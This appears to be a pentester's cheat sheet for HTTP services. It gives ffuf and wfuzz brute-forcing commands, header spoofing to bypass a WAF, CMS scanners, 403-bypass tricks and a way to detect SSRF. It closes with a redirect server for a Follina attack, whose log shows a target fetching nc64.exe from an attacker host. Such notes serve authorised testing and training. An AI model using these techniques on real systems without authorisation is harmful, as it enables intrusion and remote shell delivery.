80, 443 - HTTP(S)

Brute force directories / files / vhosts

ffuf:

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://target.com -H "Host: FUZZ.target.com"
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://target.com/FUZZ.php -b "PHPSESSID=qotlc86o7lnh9jm51atioq3fbc"

## WAF Bypass using HTTP Headers
ffuf -c -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ -H "X-Originating-IP: 127.0.0.1, X-Forwarded-For: 127.0.0.1, X-Remote-IP: 127.0.0.1, X-Remote-Addr: 127.0.0.1, X-Client-IP: 127.0.0.1"

## Find URL-parameters
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u https://target.com/admin/?FUZZ= -b "PHPSESSID=ciku9juef85i9sj1eju4alj375"  -fs 1678

wfuzz: wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ

Initial checks

Server Version

Check if there are known vulnerabilities for the server version that is running. The HTTP headers and cookies of the response could be very useful to identify the technologies and/or version being used.

webanalyze -host https://google.com -crawl 2

Default pages with interesting info

/robots.txt
/sitemap.xml
/crossdomain.xml
/clientaccesspolicy.xml
/.well-known/
Check also comments in the main and secondary pages.

CMS Scanners

If a CMS is used don't forget to run a scanner, maybe something juicy is found:

cmsmap [-f W] -F -d <URL>
wpscan --force update -e --url <URL>
joomscan --ec -u <URL>

401 Forbidden & 403 Unauthorized - Bypass

Automatic fuzzing with byp4xx

40X bypasser in Go. Methods from #bugbountytips, headers, verb tampering, user agents and more.

GitHub - lobuhi/byp4xx: Pyhton script for HTTP 40X responses bypassing. Features: Verb tampering, headers, #bugbountytips tricks and 2454 User-Agents.GitHub

502 Proxy Error - SSRF

If any page responds with 502 Proxy Error, it's probably a bad configured proxy. If you send a HTTP request like: GET https://google.com HTTP/1.1 (with the host header and other common headers), the proxy will try to access google.com and you will have found a SSRF.

Protocol version

If using HTTP/1.1 try to use 1.0 or even test if it supports 2.0.

Other bypass techniques

• Get the IP or CNAME of the domain and try contacting it directly.

• Change the protocol: from http to https, or for https to http

• Go to https://archive.org/web/ and check if in the past that file was worldwide accessible.

Python3 HTTP Redirect

Good script to redirect HTTP traffic, this is useful for bypassing certain 301 Redirect checks or when using MSDT Follina.

#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
    print("""
Usage: {} <port_number> <url>
    """.format(sys.argv[0]))
    sys.exit()

class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       self.send_response(302)
       self.send_header('Location', sys.argv[2])
       self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

$ python3 redirect.py 80 http://10.10.14.2:8888
10.10.11.175 - - [19/Aug/2022 12:18:18] "GET / HTTP/1.1" 301 -
10.10.11.175 - - [19/Aug/2022 12:18:20] "GET /nc64.exe HTTP/1.1" 301 -